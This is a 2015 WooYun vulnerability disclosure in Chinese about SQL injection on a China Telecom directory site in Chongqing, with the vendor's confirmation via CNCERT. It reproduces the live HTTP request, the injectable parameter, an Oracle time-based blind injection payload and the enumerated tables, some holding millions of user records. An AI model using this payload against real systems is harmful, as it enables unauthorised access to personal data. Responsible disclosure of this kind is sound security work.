漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0129810
漏洞标题:号码百事通重庆分站存在sql漏洞可看百万数据
相关厂商:中国电信
漏洞作者: 神秘的小胖
提交时间:2015-07-29 18:22
修复时间:2015-09-14 15:38
公开时间:2015-09-14 15:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开
简要描述:
详细说明:
号码百事通重庆分站存在sql漏洞:可查看百万用户信息
漏洞站点 http://www.118114.cq.cn/
首先,在一个页面进行抓包数据:
POST /main/queryMemberByGroupId.do?flag=1 HTTP/1.1
Host: www.118114.cq.cn
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.118114.cq.cn/main/assistant/groupMemberList.jsp
Cookie: JSESSIONID=9C39950AC11146057A0FB8958DB41B03
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
productId=&name=11&namepy=a&method=2&groupId=&Search2=%B2%E9%D1%AF
参数namepy存在sql注入
直接丢sql里面跑:
Parameter: namepy (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: productId=&name=11&namepy=a%' AND
7541=DBMS_PIPE.RECEIVE_MESSAGE(CH
R(103)||CHR(116)||CHR(77)||CHR(122),5) AND
'%'='&method=2&groupId=&Search2=%B2%E
9%D1%AF
---
[21:00:11] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
数据库名“CQ_BTS_TMP”
一部分表:
Database: CQ_BTS_TMP
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| T_EDI_CLIENT_OPERATION | 4963239 |
| T_PUSH_MESSAGE | 4249150 |
| T_MEMBER_POOL | 2636766 |
| T_MEMBER_TEL_MYLOG | 1507978 |
| T_EDI_RQ_TEST2 | 1240934 |
| T_EDI_ACCOUNT_SMS | 1174519 |
| T_MEMBER_MYLOG | 979934 |
| T_EXCEL_DATA | 903491 |
| T_IVPN_POOL | 544271 |
| T_EDI_RECOVERY | 488939 |
| IVPN_USERDETAIL_LOG2 | 487887 |
| T_EDI_EROR | 413737 |
| T_IVPN_POOL_LOG | 413559 |
| T_RPT_EDI_ACTIVE_ALLDATA | 358688 |
| TMP_IVPN_COM | 347471 |
| T_MEMBER_MOBILE_20131222 | 317631 |
| T_EDI_RPT_ACCOUNT | 264794 |
| T_EDI_REQUEST | 192346 |
不进去查看内容了。 点到为止
漏洞证明:
首先,在一个页面进行抓包数据:
POST /main/queryMemberByGroupId.do?flag=1 HTTP/1.1
Host: www.118114.cq.cn
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.118114.cq.cn/main/assistant/groupMemberList.jsp
Cookie: JSESSIONID=9C39950AC11146057A0FB8958DB41B03
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
productId=&name=11&namepy=a&method=2&groupId=&Search2=%B2%E9%D1%AF
参数namepy存在sql注入
直接丢sql里面跑:
Parameter: namepy (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: productId=&name=11&namepy=a%' AND
7541=DBMS_PIPE.RECEIVE_MESSAGE(CH
R(103)||CHR(116)||CHR(77)||CHR(122),5) AND
'%'='&method=2&groupId=&Search2=%B2%E
9%D1%AF
---
[21:00:11] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
数据库名“CQ_BTS_TMP”
一部分表:
Database: CQ_BTS_TMP
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| T_EDI_CLIENT_OPERATION | 4963239 |
| T_PUSH_MESSAGE | 4249150 |
| T_MEMBER_POOL | 2636766 |
| T_MEMBER_TEL_MYLOG | 1507978 |
| T_EDI_RQ_TEST2 | 1240934 |
| T_EDI_ACCOUNT_SMS | 1174519 |
| T_MEMBER_MYLOG | 979934 |
| T_EXCEL_DATA | 903491 |
| T_IVPN_POOL | 544271 |
| T_EDI_RECOVERY | 488939 |
| IVPN_USERDETAIL_LOG2 | 487887 |
| T_EDI_EROR | 413737 |
| T_IVPN_POOL_LOG | 413559 |
| T_RPT_EDI_ACTIVE_ALLDATA | 358688 |
| TMP_IVPN_COM | 347471 |
| T_MEMBER_MOBILE_20131222 | 317631 |
| T_EDI_RPT_ACCOUNT | 264794 |
| T_EDI_REQUEST | 192346 |
不进去查看内容了。 点到为止
修复方案:
你比我懂
版权声明:转载请注明来源 神秘的小胖@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-07-31 15:36
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
最新状态:
暂无